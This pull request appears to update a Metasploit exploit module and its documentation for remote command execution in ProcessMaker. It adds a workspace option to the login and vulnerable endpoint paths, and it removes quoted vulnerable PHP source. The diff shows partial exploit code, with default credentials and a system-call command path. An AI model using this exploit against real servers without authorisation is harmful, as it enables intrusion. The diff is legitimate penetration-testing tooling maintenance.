### PR TITLE
Update processmaker_exec module

### DIFF
--- a/documentation/modules/exploit/multi/http/processmaker_exec.md
+++ b/documentation/modules/exploit/multi/http/processmaker_exec.md
@@ -60,9 +60,25 @@
   2. Do: `use exploit/multi/http/processmaker_exec`
   3. Do: `set username [USER]`
   4. Do: `set password [PASS]`
-  5. Do: `set rhost [IP]`
-  6. Do: `run`
-  7. You should get a session
+  5. Do: `set workspace [WORKSPACE]`
+  6. Do: `set rhost [IP]`
+  7. Do: `run`
+  8. You should get a session
+
+
+## Options
+
+  **Username**
+
+  The username for a ProcessMaker user (default: `admin`).
+
+  **Password**
+
+  The password for the ProcessMaker user (default: `admin`).
+
+  **Workspace**
+
+  The ProcessMaker workspace for which the specified user has access (default: `workflow`).
 
 
 ## Sample Output

--- a/modules/exploits/multi/http/processmaker_exec.rb
+++ b/modules/exploits/multi/http/processmaker_exec.rb
@@ -49,7 +49,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('USERNAME',  [true, 'The username for ProcessMaker', 'admin']),
-        OptString.new('PASSWORD',  [true, 'The password for ProcessMaker', 'admin'])
+        OptString.new('PASSWORD',  [true, 'The password for ProcessMaker', 'admin']),
+        OptString.new('WORKSPACE', [true, 'The ProcessMaker workspace', 'workflow'])
       ])
   end
 
@@ -59,9 +60,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def execute_command(cmd, opts = { :php_function => 'system' } )
     # random vulnerable path # confirmed in versions 2.0.23 to 2.5.1
     vuln_url = [
-      '/sysworkflow/en/neoclassic/appFolder/appFolderAjax.php',
-      '/sysworkflow/en/neoclassic/cases/casesStartPage_Ajax.php',
-      '/sysworkflow/en/neoclassic/cases/cases_SchedulerGetPlugins.php'
+      "/sys#{@workspace}/en/neoclassic/appFolder/appFolderAjax.php",
+      "/sys#{@workspace}/en/neoclassic/cases/casesStartPage_Ajax.php",
+      "/sys#{@workspace}/en/neoclassic/cases/cases_SchedulerGetPlugins.php"
     ].sample
 
     # shuffle POST parameters
@@ -96,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       res = send_request_cgi({
         'method'    => 'POST',
-        'uri'       => normalize_uri(target_uri.path, "/sysworkflow/en/neoclassic/login/authentication.php"),
+        'uri'       => normalize_uri(target_uri.path, "/sys#{@workspace}/en/neoclassic/login/authentication.php"),
         'cookie'    => @cookie,
         'vars_post' => vars_post
       })
@@ -117,6 +118,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # Check credentials are valid and confirm command execution
   #
   def check
+    @workspace = datastore['WORKSPACE']
+
     # login
     @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
     unless login(datastore['USERNAME'], datastore['PASSWORD'])
@@ -169,6 +172,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    @workspace = datastore['WORKSPACE']
+
     # login
     @cookie = "PHPSESSID=#{rand_text_alphanumeric(rand(10)+10)};"
     unless login(datastore['USERNAME'], datastore['PASSWORD'])
@@ -184,25 +189,3 @@ class MetasploitModule < Msf::Exploit::Remote
     send_request_cgi({'uri' => normalize_uri(target_uri.path, "#{@fname}")})
   end
 end
-
-#
-# Source
-#
-=begin appFolder/appFolderAjax.php
-22:if (($_REQUEST['action']) != 'rename') {
-23:    $functionName = $_REQUEST ['action'];
-24:    $functionParams = isset ($_REQUEST ['params']) ? $_REQUEST ['params'] : array ();
-26:    $functionName ($functionParams);
-=end
-
-=begin cases/casesStartPage_Ajax.php
-16:$functionName = $_REQUEST['action'];
-18:$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
-19:$functionName( $functionParams );
-=end
-
-=begin cases/cases_SchedulerGetPlugins.php
-16:$functionName = $_REQUEST['action'];
-18:$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
-19:$functionName( $functionParams );
-=end


### PR DESCRIPTION
This PR adds a configuration option for the ProcessMaker workspace to the processmaker_exec module.

ProcessMaker makes use of different workspaces. A user with permission to login to one workspace may not 
have permission to log in to another. `workflow` is the default.
